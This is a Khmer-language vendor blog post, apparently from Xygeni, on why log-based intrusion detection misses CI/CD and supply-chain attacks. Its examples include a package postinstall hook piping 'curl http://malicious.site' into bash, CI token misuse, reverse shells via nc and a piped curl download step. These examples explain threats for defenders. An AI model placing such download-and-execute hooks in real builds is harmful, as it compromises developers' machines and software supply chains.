ហេតុអ្វីបានជាកំណត់ហេតុមិនគ្រប់គ្រាន់៖ ដែនកំណត់នៃ IDS ប្រពៃណីសម្រាប់អ្នកអភិវឌ្ឍន៍
អ្នកអភិវឌ្ឍន៍ភាគច្រើនទុកចិត្តលើកំណត់ហេតុដើម្បីប្រាប់ពួកគេនៅពេលដែលមានអ្វីមួយខុស។ ប៉ុន្តែប្រសិនបើការការពារតែមួយគត់របស់អ្នកគឺការជូនដំណឹងផ្អែកលើកំណត់ហេតុ អ្នកនៅពីក្រោយរួចទៅហើយ។ ប្រព័ន្ធរកឃើញការឈ្លានពានបែបប្រពៃណីផ្តោតលើការរំលោភលើបរិវេណ។ មិនអើពើនឹងរបៀបដែលអ្នកវាយប្រហារផ្លាស់ទីនៅខាងក្នុង CI/CD pipelines, កុងតឺន័រ និងកញ្ចប់ប្រភពបើកចំហ។
វិធីសាស្រ្តដែលផ្តោតលើអ្នកអភិវឌ្ឍន៍គួរតែធ្វើច្រើនជាងការត្រួតពិនិត្យកំណត់ហេតុ។ វាគួរតែយល់ពីកូដរបស់អ្នក ការបង្កើតរបស់អ្នក និងលំហូរការងាររបស់អ្នក។
នេះជាអ្វីដែល IDS ប្រពៃណីខកខាន៖
- ការប្រើប្រាស់ឡើងវិញនូវព័ត៌មានសម្គាល់នៅទូទាំងការងារ ឬសាខានានា
- ចលនាចំហៀងរវាងភ្នាក់ងារសាងសង់ ឬតួនាទីពពក
- ពាក្យបញ្ជាដែលគ្មានការអនុញ្ញាតត្រូវបានចាក់ចូលទៅក្នុងកម្មវិធីសាកល្បង
អ្នកវាយប្រហារមិនបន្សល់ទុកកំណត់ហេតុជាក់ស្តែងទេ។ ពួកគេលាយឡំជាមួយការបង្កើត កែប្រែស្គ្រីប ឬកែប្រែភាពអាស្រ័យ។ នោះហើយជាមូលហេតុដែលអ្នកត្រូវការប្រព័ន្ធឈ្លានពាន និងរកឃើញដែលបង្កើតឡើងសម្រាប់វិធីដែលកូដត្រូវបានសរសេរ ដាក់ពង្រាយ និងដឹកជញ្ជូន មិនមែនសម្រាប់តែហេដ្ឋារចនាសម្ព័ន្ធនោះទេ។
ផ្លូវវាយប្រហារពិតប្រាកដដែលរំលងប្រព័ន្ធរកឃើញការឈ្លានពានជាមូលដ្ឋាន
ខាងក្រោមនេះជាវិធីដែលពួកអ្នកវាយប្រហារតែងតែរំលងការចូលប្រើកំណត់ហេតុជាប្រចាំ៖
ឧទាហរណ៍ទី 1: ការលួចយកការពឹងផ្អែកពីប្រភពបើកចំហ
scripts:
postinstall: curl http://malicious.site | bash
⚠️វានឹងមិនបង្កឱ្យមានការជូនដំណឹងទេ ប្រសិនបើ IDS របស់អ្នកមិនស្កេនឥរិយាបថនៃការពឹងផ្អែក។
ឧទាហរណ៍ទី 2: ការចូលប្រើដោយគ្មានការអនុញ្ញាតចំពោះស្គ្រីបអភិវឌ្ឍន៍ផ្ទៃក្នុង
curl -H "Authorization: $CI_TOKEN" https://internal.dev/scripts/build.sh
⚠️ ប្រសិនបើ IDS មិនតាមដានការប្រើប្រាស់ថូខឹនក្នុងមួយបរិបទការងារទេ នេះនឹងត្រូវបានខកខាន។
ឧទាហរណ៍ទី 3: CI pipeline ការរំលោភបំពាន
អ្នកវាយប្រហារបន្ថែមភាពស្ងៀមស្ងាត់ chmod + x និង nc ពាក្យបញ្ជានៅខាងក្នុងជំហានការងារដើម្បីបង្កើត សែលបញ្ច្រាស. ករណីពិតទាំងនេះរំលងការដំឡើងប្រព័ន្ធរកឃើញ និងការឈ្លានពានជាមូលដ្ឋាន ពីព្រោះ IDS បែបប្រពៃណីខ្វះភាពមើលឃើញទៅលើឥរិយាបថកូដ និង CI/CD តក្ក។
អ្វីដែលប្រព័ន្ធរកឃើញការឈ្លានពានទំនើបគួរចាប់យក CI/CD
អ្នកអភិវឌ្ឍន៍ត្រូវការប្រព័ន្ធរកឃើញការឈ្លានពានដែលមើលឃើញហួសពីបណ្តាញ និងចូលទៅក្នុង ផ្លូវកូដទៅ prodអត្តសញ្ញាណប័ណ្ណទំនើបសម្រាប់ CI/CD ត្រូវតែ:
- កម្មវិធីត្រួតពិនិត្យ ការប្រតិបត្តិពាក្យបញ្ជា នៅខាងក្នុង pipelines
- ដាន ការចូលប្រើព័ត៌មានបញ្ជាក់អត្តសញ្ញាណ ឆ្លងកាត់ការងារ និងដំណាក់កាលនានា
- អនុវត្ត។ ការត្រួតពិនិត្យកញ្ចប់ នៅខាងក្នុងកុងតឺន័រ និងឧបករណ៍រត់បណ្ដោះអាសន្ន
- រកឃើញ។ ភាពមិនប្រក្រតីនៃការសាងសង់ដូចជាដែនចេញថ្មី ឬឧបករណ៍ដែលបានកែប្រែ
ឧទាហរណ៍ ៖ Pipelineការរកឃើញកម្រិត
- name: Check for unusual downloads
run: |
curl -s $URL | bash # suspicious download
IDS ដែលងាយស្រួលសម្រាប់អ្នកអភិវឌ្ឍន៍គួរតែដាក់ទង់ជាតិលើឥរិយាបថនេះនៅក្នុងបរិបទនៃ CI/CD. ប្រព័ន្ធរកឃើញ និងឈ្លានពានរបស់អ្នកគួរតែតាមដានឥរិយាបថការងារសាងសង់ដូចជាការផ្លាស់ប្ដូរកូដ តក្កវិជ្ជាសាកល្បងដែលបានផ្លាស់ប្ដូរ និងស្គ្រីបដែលបានកែប្រែ មិនមែនគ្រាន់តែភាពមិនប្រក្រតីនៃចរាចរណ៍នោះទេ។
ការបង្កប់ IDS ទៅក្នុងលំហូរការងារអភិវឌ្ឍន៍ដោយមិនធ្វើឱ្យការដឹកជញ្ជូនយឺត
ឧបករណ៍សុវត្ថិភាពជារឿយៗធ្វើឱ្យក្រុមអភិវឌ្ឍន៍យឺតយ៉ាវ។ ប៉ុន្តែប្រព័ន្ធរកឃើញការឈ្លានពានដ៏ល្អមួយអាចត្រូវបានបង្កប់ដោយគ្មានការកកិត៖
- ព្រឹត្តការណ៍ hooks: ភ្ជាប់ព្រឹត្តិការណ៍បង្កើតទៅនឹងឧបករណ៍បង្កការត្រួតពិនិត្យ IDS
- ផ្លូវសវនកម្មដែលមានរចនាសម្ព័ន្ធ: កត់ត្រាដានពាក្យបញ្ជាសម្រាប់ការផ្ទៀងផ្ទាត់ មិនមែនការស្តីបន្ទោសទេ
- ការជូនដំណឹងតាមបរិបទ៖ ប្រុងប្រយ័ត្នចំពោះឥរិយាបថថ្មី មិនមែនគ្រាន់តែគំរូអាក្រក់ដែលគេស្គាល់នោះទេ
- ការជូនដំណឹងជាដំណាក់កាល: អនុញ្ញាតឱ្យអ្នកអភិវឌ្ឍន៍ស៊ើបអង្កេតក្នុងដំណាក់កាលមុនពេលបង្កើនភាពតានតឹង
ឧទាហរណ៍ DevSecOps៖
- name: Monitor for unusual env variable use
run: |
if [[ "$SECRET" != "" ]]; then echo "Flagged usage"; fi
នេះធានានូវភាពមើលឃើញនៃគំរូនៃការប្រើប្រាស់ដោយមិនរារាំងការបង្កើត។ គោលដៅមិនមែនដើម្បីបន្ថែមការជូនដំណឹងបន្ថែមទៀតទេ វាគឺដើម្បីបង្កើតការយល់ដឹងរបស់អ្នកអភិវឌ្ឍន៍ដែលបង្ហាញពីហានិភ័យដែលមានអត្ថន័យដោយមិនធ្វើឱ្យខូចលំហូរ។
លើសពីកំណត់ហេតុជាមួយ Xygeni៖ តាមដាន រកឃើញ និងកាត់បន្ថយ
កំណត់ហេតុបង្ហាញពីអ្វីដែលបានកើតឡើង។ ស៊ីហ្គេនី បង្ហាញពីរបៀប និងមូលហេតុដែលវាកើតឡើង។ Xygeni បង្កើនប្រព័ន្ធរកឃើញ និងឈ្លានពានរបស់អ្នកជាមួយ៖
- CI/CD- ទំនាក់ទំនងចរាចរណ៍ដឹង
- សមត្ថភាពតាមដានកូដដើម្បីដាក់ពង្រាយ
- ការរកឃើញស្គ្រីបក្រោយការដំឡើងនៅក្នុងកញ្ចប់
- ការរកឃើញភាពមិនធម្មតា សម្រាប់ពាក្យបញ្ជាពេលសាងសង់
- ភាពមើលឃើញជាក់ស្តែងចំពោះការផ្លាស់ប្តូរដែលគ្មានការអនុញ្ញាត
មិនថាវាជាការពឹងផ្អែកដែលត្រូវបានកែប្រែ ពាក្យបញ្ជាសែលថ្មីនៅក្នុងការបង្កើត ឬការប្រើប្រាស់ថូខឹនខុសទេ Xygeni ភ្ជាប់ទំនាក់ទំនងឥរិយាបថនោះនៅទូទាំងបរិស្ថានរបស់អ្នក។ នោះហើយជារបៀបដែលប្រព័ន្ធរកឃើញការឈ្លានពានគួរដំណើរការ៖ ស្គាល់កូដ pipeline- ឆ្លាតវៃ និងងាយស្រួលសម្រាប់អ្នកអភិវឌ្ឍន៍។
លើសពីកំណត់ហេតុ៖ ការកសាងប្រព័ន្ធដែលអ្នកអភិវឌ្ឍន៍អាចទុកចិត្តបាន
ប្រសិនបើអ្នកគ្រាន់តែពិនិត្យមើលកំណត់ហេតុ អ្នកនឹងកំពុងពិនិត្យមើលបន្ទាប់ពីការខូចខាតត្រូវបានបញ្ចប់។ អ្នកអភិវឌ្ឍន៍ត្រូវការប្រព័ន្ធរកឃើញការឈ្លានពានដែលយល់ពីរបៀបដែលកូដដំណើរការ របៀបដែលការបង្កើតដំណើរការ និង របៀបដែលអ្នកវាយប្រហារផ្លាស់ទីឆ្លងកាត់ CI/CD. អត្តសញ្ញាណប័ណ្ណរបស់អ្នកគួរតែ៖
- ចាប់ហានិភ័យក្នុងការសាងសង់ មិនមែនគ្រាន់តែចរាចរណ៍ទេ
- តាមដានការផ្លាស់ប្តូរកម្រិតពាក្យបញ្ជា
- រកឃើញការគំរាមកំហែងពិតប្រាកដនៅទូទាំង repos, កញ្ចប់ និងស្គ្រីប
ប្រើប្រាស់ Xygeni ដើម្បីបង្កប់ប្រព័ន្ធរកឃើញ និងឈ្លានពានទំនើបមួយដែលសមស្របទៅនឹងរបៀបដែលក្រុមរបស់អ្នកសរសេរ និងផ្ញើកូដ មុនពេលអ្នកវាយប្រហារលួចចូលដោយមិនដឹងខ្លួន។ សាងសង់ដោយសុវត្ថិភាព។ ដឹកជញ្ជូនលឿន។ រកឃើញការគំរាមកំហែងនៅកន្លែងដែលពួកគេរស់នៅ៖ នៅក្នុងរបស់អ្នក pipelines.







